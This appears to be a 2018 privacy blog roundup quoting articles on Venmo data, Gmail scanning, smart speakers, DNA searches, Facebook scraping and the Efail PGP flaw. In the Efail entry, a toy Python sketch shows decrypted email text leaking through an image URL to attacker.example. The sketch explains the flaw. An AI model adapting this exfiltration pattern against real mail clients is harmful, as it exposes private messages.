By default, users of the Venmo payment service allow Venmo to mine their transaction data and share everything except the payment amounts. Venmo has chosen to exercise this liberty by providing a Web interface through which anyone with Internet access can download the transaction data — no authentication necessary!
It turns out that some people treat the text fields, which are meant for documenting the reason for a payment and sending a comment to the recipient, as opportunities for other modes of discourse.
“A Privacy Researcher Uncovered a Year's Worth of Breakups and Drug Deals Using Venmo's Public Data”
Samantha Cole, Motherboard, July 17, 2018
Payment exchanges accumulate in a public feed, where people thought it was hysterical to write things like “money for drugs” or “sexual favors” for otherwise-innocuous payments. …
It's not so much the exposure of the intimate details of your life, … but that each transaction is just one data point in a massive web of knowledge companies like Venmo are building about us. And once they know who we're closely connected to, what we buy, and when, that's an immensely valuable dataset for companies to use in targeting your future decisions.
“Tech's ‘Dirty Secret’: App Developers Sift Through Your Gmail”
Douglas MacMillan, The Wall Street Journal, July 2, 2018
But the Internet giant continues to let hundreds of outside software developers scan the inboxes of millions of Gmail users who signed up for email-based services offering shopping price comparisons, automated travel-itinerary planners or other tools. Google does little to police those developers, who train the computers — and, in some cases, employees — to read their users' emails …
Letting employees read user emails has become “common practice” for companies that collect this type of data, says Thede Loder, the former chief technology officer at eDataSource Inc. … He says engineers at eDataSource occasionally reviewed emails when building and improving software algorithms.
“Some people might consider that to be a dirty secret,” says Mr. Loder. “It's kind of reality.”
“Deceived by Design: How Tech Companies Use Dark Patterns to Discourage Us from Exercising Our Rights to Privacy”
Forbrukerrådet, June 27, 2018
“Alexa, When's My Next Class? This University Is Giving Out Amazon Echo Dots”
Elizabeth Weise, USA Today, June 20, 2018
Not to mention the problem of Alexa “simply overhearing” otherwise private information spoken aloud by anyone within microphone range …
Starting this fall, some students at Northeastern University in Boston will be given the option of getting an Echo Dot smart speaker linked to their university accounts. They'll be able to ask Amazon's Alexa what time their classes are, how much money's left on their food card and even how much they owe the bursar's office.
The program gives students instant access to information they would have to call or go online for, as well as taking pressure off the school's offices. It also makes Amazon's digital assistant a go-to source for a generation who will inhabit a world in which talking to computers is commonplace and who will soon have paychecks to spend.
At the same time, it raises questions about security and privacy for young adults living in close quarters, often on their own for the first time. …
Alexa can't differentiate between different people's voices, so a prying roommate could be an issue, said Paul Bischoff, a privacy advocate with Comparitech.com, a security and privacy review site.
“There's also the problem of third parties simply overhearing otherwise private information spoken aloud by Alexa,” he said.
“Golden State Killer Suspect Arrest Opens Floodgates for Law Enforcement Use of DNA Websites”
Steve Horn, Criminal Legal News, May 31, 2018
The use of DNA-based genealogy websites to track down the “Golden State Killer” suspect, Joseph DeAngelo, appears to have inspired police departments nationwide. It's a move that has irked privacy advocates and criminal justice system reformers. …
Most criminal law experts say those who hand over their DNA to websites like GEDmatch have no expectation of privacy under the Fourth Amendment. … Whether that same legal logic applies to their extended relatives, though, will remain an open question as the Golden State Killer's case weaves its way through the courts.
“Why the Golden State Killer Investigation Is Cause for Concern”
Vera Eidelman, Free Future, American Civil Liberties Union, May 11, 2018
We should be able to access the benefits of technological advances without giving up our rights.
Coming next year: Amazon applies machine learning to DNA databases to infer users' purchasing preferences and tendency to comparison-shop, enabling differential pricing for persons whose relatives' genetic constitution shows that they are indifferent to overpaying.
Some security researchers have discovered a new attack on PGP. They have written a paper explaining how it works and plan to publish it tomorrow, but the Electronic Frontier Foundation has learned enough about it that they are sounding an alarm even before the details are public:
“Attention PGP Users: New Vulnerabilities Require You to Take Action Now”
Danny O'Brien and Gennie Gebhart, Deeplinks, Electronic Frontier Foundation, May 13, 2018
A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with this research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages. …
Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.
The story includes links to instructions provided by the EFF on how to temporarily disable the PGP plug-ins for Thunderbird, Apple Mail, and Outlook.

Update (2018-05-14⊺11:34:32-05:00)
The discoverers of the attack now have a Web site up and have published a draft of their paper there:
“Efail: Breaking S/MIME and OpenPGP Email Encryption Using Exfiltration Channels”
Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, and Jörg Schwenk, May 14, 2018
There are actually two vulnerabilities. One exploits peculiarities, arguably errors, in mail user agents that parse and interpret HTML in messages after they have been decrypted. The other exploits a weakness in the OpenPGP standard: Under certain circumstances, the standard doesn't require integrity checks and doesn't specify what a decryption algorithm should do when an integrity check fails. Consequently, many mail user agents do the wrong thing when they receive a message that has been tampered with.
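The first of these vulnerabilities is easy to simulate. The toy sketch below (the domain attacker.example, the plaintext, and all the helper names are made up for illustration; this is not the paper's exact exploit) shows how a client that concatenates decrypted MIME parts into a single HTML document before rendering it leaks plaintext through an image URL:

```python
# Toy simulation of the "direct exfiltration" channel: the attacker
# sandwiches a captured ciphertext between two HTML body parts that
# they control. A careless mail client decrypts the middle part and
# renders the concatenation of all three, so the recovered plaintext
# lands inside an image URL that the client then fetches from the
# attacker's server.

def fake_decrypt(ciphertext: str) -> str:
    # Stand-in for the victim's PGP decryption of the stolen message.
    return "secret meeting at noon"

# Attacker-controlled parts; the <img> tag is deliberately left open.
part_before = '<img src="https://attacker.example/'
part_after = '">'

def render(parts) -> str:
    # A vulnerable client concatenates all (decrypted) parts into one
    # HTML document before parsing it.
    return "".join(parts)

html = render([part_before, fake_decrypt("<captured ciphertext>"), part_after])
print(html)  # the plaintext is now part of the image URL
```

Because the opening image tag in the first part is never closed, the decrypted plaintext becomes part of the URL, and a client with remote-content loading enabled exfiltrates it merely by trying to fetch the image.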
The Electronic Frontier Foundation has a follow-up, and other security authorities are providing quick analysis as well:
“Not So Pretty: What You Need to Know about E-Fail and the PGP Flaw”
Erica Portnoy, Danny O'Brien, and Nate Cardozo, Deeplinks, Electronic Frontier Foundation, May 14, 2018
“Some Notes on eFail”
Robert Graham, Errata Security, May 14, 2018
“New Vulnerabilities in Many PGP and S/MIME Enabled Email Clients”
Matthew Green, Twitter, May 14, 2018
Dental-insurance companies are big fans of network-connected toothbrushes and will send them out as freebies — repeatedly and insistently.
“Our Dental Insurance Sent Us ‘Free’ Internet-Connected Toothbrushes. And This Is What Happened Next”
Wolf Richter, Wolf Street, April 14, 2018
The author's family eventually figured out that you can use the toothbrush, and even switch on the electricity so that the brush head vibrates automatically, without activating the network connection, provided you're careful to switch off Bluetooth on your phone before brushing your teeth. Now, however, they worry about the next step in the process:
We're expecting a series of emails that start out gently, and every two weeks or so get increasingly emphatic, telling us that we better start setting up the Internet connection to our toothbrushes and start sending our data to the cloud.
What's next? The day when we cannot get dental insurance without internet-connected toothbrushes. …
For now, our household is still able to at least partially block this intrusion. But there will be a day when we will be forced to surrender our data to get health insurance, drive a car, or have a refrigerator and a thermostat in the house. This is where this is going. Why? Because data is where the money is. And because many consumers are embracing it.
One downside to the emergence of user control of data collection and access as a political meme and substitute for reasoned argument is the likely countermove from the surveillance industry: conflating the user's right to privacy with the corporation's responsibility for confidentiality. Surveillance is unethical and irresponsible even when the corporation carefully manages third-party access to the dossiers it compiles.
“When the Business Model Is the Privacy Violation”
Arvind Narayanan, Freedom to Tinker, April 12, 2018
In other situations, the intended use is the privacy violation. The most prominent example is the tracking of our online and offline habits for targeted advertising. This business model is exactly what people object to, for a litany of reasons: targeting is creepy, manipulative, discriminatory, and reinforces harmful stereotypes. The data collection that enables targeted advertising involves an opaque infrastructure to which it's impossible to give meaningfully informed consent. …
In response to privacy laws, companies have tried to find technical measures that obfuscate the data but allow them [to] carry on with the surveillance business as usual. But that's just privacy theater. Technical steps that don't affect the business model are of limited effectiveness, because the business model is fundamentally at odds with privacy; this is in fact a zero-sum game. …
Privacy advocates should recognize that framing a concern about data use practices as a privacy problem is a double-edged sword. Privacy can be a convenient label for a set of related concerns, but it gives industry a way to deflect attention from deeper ethical questions by interpreting privacy narrowly as confidentiality.
And here we have it:
While Zuckerberg claimed that major transparency efforts are on the company's horizon, he seemed dismissive of users' concerns about their privacy. The recent movement to #DeleteFacebook, he said, had “no meaningful impact” on the company or Facebook usage.
“Facebook knows so much about you,” he added, “because you chose to share it with your friends and put it on your profile.”
“Mark Zuckerberg: ‘It Was My Mistake’ Facebook Compromised Data of 87 Million Users”
Sarah Emerson, Motherboard, April 4, 2018
Facebook's actions and policy changes are about tightening up their control over access to the dossiers that Facebook compiles, which are now the company's intellectual property and primary business asset. Facebook has zero interest in their users' so-called “concerns about their privacy” and is not impressed by the feeble attempts of a few rabble-rousers to impede the juggernaut.
Just to drive home the point, Facebook's Chief Technology Officer recently conceded in the company blog that “malicious actors” have acquired “most” Facebook users' profile information. (Naturally, he buries the lede in the seventh paragraph of the post.)
“An Update on Our Plans to Restrict Data Access on Facebook”
Mike Schroepfer, Facebook Newsroom, April 4, 2018
Until today, people could enter another person's phone number or email address into Facebook search to help find them. … However, malicious actors have also abused these features to scrape public profile information by submitting phone numbers or email addresses they already have through search and account recovery. Given the scale and sophistication of the activity we've seen, we believe most people on Facebook could have had their public profile scraped in this way.
Now that Siri, Alexa, Cortana, and their friends are pretty well established as commonplace services in homes, apartments, and hotel rooms, and people have demonstrated their willingness to accept and rely on devices with always-on microphones and cameras, the companies that make them are sneaking more weasel words into their nominal commitments to user privacy.
The peg for this story is the reporter's discovery of patent applications, filed by Amazon and Google, for using the data generated by continuous monitoring of the always-on mikes to target advertising more accurately, to determine people's moods, to infer their state of health, to find out whether a child is up to some minor mischief (and generate an appropriate reprimand), and so on. As the reporter points out, companies often generate patent applications like these regardless of whether they have any intention of using the technology (and, indeed, regardless of whether the technology would actually work). On the other hand, such documents reveal how the big surveillance capitalism companies are thinking about the future of their products and express in a more genuine and sincere way the companies' attitudes towards the privacy of their users.
“Hey, Alexa, What Can You Hear? And What Will You Do with It?”
Sapna Maheshwari, The New York Times, March 31, 2018
An Oxford lecturer in international development prescribes what needs to be done in order to restore privacy to Internet users.
“‘Cambridge Analytica’: Surveillance Is the DNA of the Platform Economy”
Ivan Manokha, Open Democracy, March 23, 2018
The current social mobilization against Facebook resembles the actions of activists who, in opposition to neoliberal globalization, smash a McDonald's window during a demonstration.
What we need is a total redefinition of the right to privacy (which was codified as a universal human right in 1948, long before the Internet), to guarantee its respect, both offline and online.
What we need is a body of international law that will provide regulations and oversight for the collection and use of data.
What is required is an explicit and concise formulation of terms and conditions which, in a few sentences, will specify how users' data will be used.
It is important to seize the opportunity presented by the Cambridge Analytica scandal to push for these more fundamental changes.
But the Cambridge Analytica scandal provides no such opportunity. The Snowden revelations (2013) were the last, best opportunity, and at that time we looked at the facts and decided not to do anything about them. The current reaction to Cambridge Analytica is just some extremely faint and transient buyer's remorse, amplified by a few politicians who assumed for years that their opponents didn't understand technology well enough to turn it to their advantage.
A research team at Boston University has discovered a technique for partially encrypting messages so as to make decryption extremely expensive, but not impossible. They call their partial-encryption system “cryptographic crumpling.” The computation required to decrypt a message prepared by this technique is useless in the decryption of any other message, so there are no economies of scale — the decryptor must pay the high computational price all over again for each new message.
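The mechanism can be illustrated with a toy sketch (assumed parameters and invented helper names throughout; this is not the researchers' actual construction): encrypt each message under a fresh random key, then publish that key with some of its bits withheld, so that decryption requires a brute-force search whose full cost must be paid anew for every message.

```python
import hashlib
import os

# Each message gets a fresh random key; the sender publishes the key
# with its low HIDDEN_BITS bits withheld. Recovering one message then
# costs a search over 2**HIDDEN_BITS candidate keys, and because every
# message uses an independent key, that work buys nothing toward any
# other message. Real proposals would hide far more bits.
HIDDEN_BITS = 16

def keystream(key: bytes, length: int) -> bytes:
    # Hash-based stream cipher, for illustration only.
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def crumple_encrypt(plaintext: bytes):
    key = int.from_bytes(os.urandom(8), "big")
    stream = keystream(key.to_bytes(8, "big"), len(plaintext))
    ciphertext = bytes(a ^ b for a, b in zip(plaintext, stream))
    partial_key = (key >> HIDDEN_BITS) << HIDDEN_BITS  # withhold low bits
    checksum = hashlib.sha256(plaintext).digest()[:8]  # to recognize success
    return ciphertext, partial_key, checksum

def crumple_decrypt(ciphertext, partial_key, checksum):
    # The expensive part: try every possible value of the hidden bits.
    for guess in range(2 ** HIDDEN_BITS):
        key = (partial_key | guess).to_bytes(8, "big")
        stream = keystream(key, len(ciphertext))
        candidate = bytes(a ^ b for a, b in zip(ciphertext, stream))
        if hashlib.sha256(candidate).digest()[:8] == checksum:
            return candidate
    raise ValueError("hidden key bits not found")

ct, pk, ck = crumple_encrypt(b"meet at noon")
print(crumple_decrypt(ct, pk, ck))
```

With 16 hidden bits the search finishes in under a second on a laptop; the point of the real proposal is to set the hidden portion high enough that each decryption costs a well-funded agency real money.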
The researchers offer their system as a way of resolving the “second crypto wars” between government officials, who insist that the makers of all commercial-grade encryption software must provide back doors for law-enforcement and national-security agencies, and privacy advocates, who insist that only strong, end-to-end encryption will protect their rights. The researchers argue that their system would allow well-funded government agencies to access the partially encrypted data in exceptional cases, but would force those agencies to choose their targets so carefully that the privacy rights of ordinary users would not be significantly affected.
But this proposal doesn't really accommodate either side. Government officials say they need to decrypt messages that could contain evidence of crime or terrorism regardless of how many such messages there are, and so would not be content with a system in which their budget constrains their ability to decrypt. And privacy advocates would surely note that if government officials with legitimate interests in the contents of communications were able to perform the decryptions, so too would corporations bent on industrial espionage, hostile foreign governments, and even well-funded hacking teams. A back door works equally well for everyone who has the resources to open it.
Such failed attempts at compromise reinforce the conclusion (which most security analysts reached long ago) that the requirements of government officials and privacy advocates are incompatible.
“Cryptographic Crumpling: The Encryption ‘Middle Ground’ for Government Surveillance”
Charlie Osborne, Zero Day, March 19, 2018
Now, in preparation for the European Union's General Data Protection Regulation, PayPal has published the list of these third-party service providers and, er, other business partners.
“List of Third Parties (Other Than PayPal Customers) with Whom Personal Information May Be Shared”
PayPal, January 1, 2018
Dare you to read to the end.
As a proponent and practitioner of technological skepticism, the practice of assessing technological innovations and judging whether they will make me any wiser, better, happier, or more helpful to others before deciding whether to adopt them, I'm gratified to see other people thinking along the same lines and trying to organize the outraged victims of thoughtlessly misdesigned technology.
“There Are No Guardrails on Our Privacy Dystopia”
David Golumbia and Chris Gilliard, Motherboard, March 9, 2018
Tech companies … have demonstrated that they are neither capable nor responsible enough to imagine what harms their technologies may do. If there is any hope for building digital technology that does not include an open door to wolves, recent experience has demonstrated that this must include robust engagement from the non-technical — expert and amateur alike — not just in response to the effects of technologies, but to the proposed functions of those technologies in the first place.
“What If Designers Took a Hippocratic Oath?”
Sanjena Sathian, Point Taken, PBS, January 1, 2016
What are we really looking at? A next-generation consumer advocacy battle, one in which a victory depends not on class action lawsuits or government oversight but on popular awareness and education.
An essay by a public intellectual reflecting on the value of privacy and pointing out that many people prefer it to constant social interaction. This retrospective view, bordering on denialism, is surely one of the last expressions of the values that prevailed in the era before total and inevitable surveillance.
“Luxuriating in Privacy”
Sarah Perry, ribbonfarm, March 1, 2018
Privacy is wonderful in and of itself, and privacy keeps the peace.
Yes. And its disappearance is a reflection of the prevalence of total war.
“The House That Spied on Me”
Kashmir Hill and Surya Mattu, Gizmodo, February 9, 2018
Getting a smart home means that everyone who lives or comes inside it is part of your personal panopticon, something which may not be obvious to them because they don't expect everyday objects to have spying abilities. One of the gadgets — the Eight Sleep Tracker — seemed aware of this, and as a privacy-protective gesture, required the email address of the person I sleep with to request his permission to show me sleep reports from his side of the bed. But it's weird to tell a gadget who you are having sex with as a way to protect privacy, especially when that gadget is monitoring the noise levels in your bedroom. …
I was looking forward to the end of the experiment and getting rid of all the Internet-connected devices I'd accumulated, as well as freeing up the many electrical outlets they'd been hogging. …
But the truth is that my house will remain smart, just like yours may be. Almost every TV on the market now is connected — because otherwise how do you Netflix and chill? — and over 25 million smart speakers were sold last year alone, with Apple soon to release its version, the HomePod, meaning a good percentage of American homes have or will have an internet-connected assistant waiting patiently for someone in the house to say their wake word. …
We may already be past the point of no return: internet functionality is a necessary component for the operation of many devices in our home, and it increasingly gets added on as a feature even when it's not strictly necessary. … Once the data is going over the wires, companies can't seem to resist peeking at it, no matter how sensitive it is.